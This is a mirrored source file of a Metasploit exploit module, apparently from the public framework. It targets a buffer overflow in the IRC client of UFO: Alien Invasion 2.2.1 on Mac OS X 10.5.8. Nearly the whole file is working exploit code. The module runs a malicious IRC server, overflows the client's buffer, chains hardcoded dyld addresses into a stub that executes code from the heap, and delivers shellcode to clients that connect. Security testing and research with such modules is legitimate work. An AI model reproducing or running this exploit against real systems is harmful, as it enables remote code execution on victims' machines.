Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/misc/ufo_ai.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::TcpServer

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'UFO: Alien Invasion IRC Client Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in the IRC client component

18
          of UFO: Alien Invasion 2.2.1.

19
        },

20
        'Author' => [

21
          'Jason Geffner', # Original Windows PoC Author

22
          'dookie' # OSX Exploit Author

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'OSVDB', '65689' ],

27
          [ 'EDB', '14013' ]

28
        ],

29
        'Payload' => {

30
          'Space' => 400,

31
          'BadChars' => "\x00\x0a\x0d",

32
          'MaxNops' => 0,

33
          'StackAdjustment' => -3500,

34
        },

35
        'Platform' => 'osx',

36
        'Targets' => [

37
          [

38
            'Mac OS X 10.5.8 x86, UFOAI 2.2.1',

39
            {

40
              'Arch' => ARCH_X86,

41
              'Offset' => 524,

42
              'Writable' => 0x8fe66448, # dyld __IMPORT

43
              # The rest of these addresses are in dyld __TEXT

44
              'setjmp' => 0x8fe1cf38,

45
              'strdup' => 0x8fe210dc,

46
              'jmp_eax' => 0x8fe01041

47
            }

48
          ]

49
        ],

50
        'DefaultTarget' => 0,

51
        'DisclosureDate' => '2009-10-28',

52
        'Notes' => {

53
          'Reliability' => UNKNOWN_RELIABILITY,

54
          'Stability' => UNKNOWN_STABILITY,

55
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

56
        }

57
      )

58
    )

59


60
    register_options(

61
      [

62
        OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ]),

63
      ]

64
    )

65
  end

66


67
  def make_exec_payload_from_heap_stub()

68
    frag0 =

69
      "\x90" + # nop

70
      "\x58" + # pop eax

71
      "\x61" + # popa

72
      "\xc3"   # ret

73


74
    frag1 =

75
      "\x90" +             # nop

76
      "\x58" +             # pop eax

77
      "\x89\xe0" +         # mov eax, esp

78
      "\x83\xc0\x0c" +     # add eax, byte +0xc

79
      "\x89\x44\x24\x08" + # mov [esp+0x8], eax

80
      "\xc3"               # ret

81


82
    setjmp = target['setjmp']

83
    writable = target['Writable']

84
    strdup = target['strdup']

85
    jmp_eax = target['jmp_eax']

86


87
    exec_payload_from_heap_stub =

88
      frag0 +

89
      [setjmp].pack('V') +

90
      [writable + 32, writable].pack("V2") +

91
      frag1 +

92
      "X" * 20 +

93
      [setjmp].pack('V') +

94
      [writable + 24, writable, strdup, jmp_eax].pack("V4") +

95
      "X" * 4

96
  end

97


98
  def on_client_connect(client)

99
    print_status("Got client connection...")

100


101
    offset = target['Offset']

102


103
    buffer = "001 :"

104
    buffer << rand_text_alpha_upper(offset)

105
    buffer << make_exec_payload_from_heap_stub()

106
    buffer << make_nops(16)

107
    buffer << payload.encoded

108
    buffer << "\x0d\x0a"

109


110
    print_status("Sending exploit to #{client.peerhost}:#{client.peerport}...")

111
    client.put(buffer)

112
  end

113
end

114


115